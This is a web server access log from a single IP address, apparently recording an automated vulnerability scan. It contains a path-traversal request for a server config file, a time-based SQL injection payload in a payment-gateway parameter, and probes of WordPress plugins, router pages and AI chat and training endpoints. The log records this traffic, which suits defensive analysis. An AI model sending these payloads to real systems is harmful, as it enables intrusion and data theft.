[24/Apr/2025:12:10:01 -0400] "POST /cgi/getParm HTTP/1.1" 200 0 "http://tplinkwifi.net" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36" 154.84.62.234 - - 
[24/Apr/2025:12:10:26 -0400] "GET /toolbox-resource/../serverconfig.xml HTTP/1.1" 200 118913 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.18" 154.84.62.234 - - [24/Apr/2025:12:10:30 -0400] "GET /RST_status.htm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/617.2.4 (KHTML, like Gecko) Version/17.3 Safari/617.2.4" 154.84.62.234 - - [24/Apr/2025:12:10:33 -0400] "GET /RST_status.htm?x=1.gif HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:12:11:09 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:12:11:33 -0400] "POST /api/v0/train HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:12:11:45 -0400] "GET /wp-json/wp/v2/give_forms/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:12:11:48 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.2.22" 154.84.62.234 - - [24/Apr/2025:12:12:38 -0400] "GET /wp-content/plugins/cz-loan-management/README.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:12:12:38 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:13:26 -0400] "GET /TS/export/pagedefinition?ID=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 
154.84.62.234 - - [24/Apr/2025:12:13:34 -0400] "GET /?wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(6)))a) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:14:07 -0400] "POST /models/apply HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:12:14:19 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:14:41 -0400] "GET /wp-content/plugins/wps-hide-login/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:12:15:02 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:15:38 -0400] "POST /chat/completions HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" 154.84.62.234 - - [24/Apr/2025:12:16:00 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:12:16:06 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0" 154.84.62.234 - - [24/Apr/2025:12:16:07 -0400] "GET /interface-data/books-init HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 154.84.62.234 - - [24/Apr/2025:12:16:09 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.79" 154.84.62.234 - - [24/Apr/2025:12:16:10 -0400] "GET /interface-data/books-init HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; 
rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:12:16:49 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_5_7; es) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.7 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:12:16:57 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:17:26 -0400] "POST /tracking/client_1/get-resource HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.25" 154.84.62.234 - - [24/Apr/2025:12:17:27 -0400] "POST /tracking/client_1/read-instruction HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/617.16.12 (KHTML, like Gecko) Version/17.7.92 Safari/617.16.12"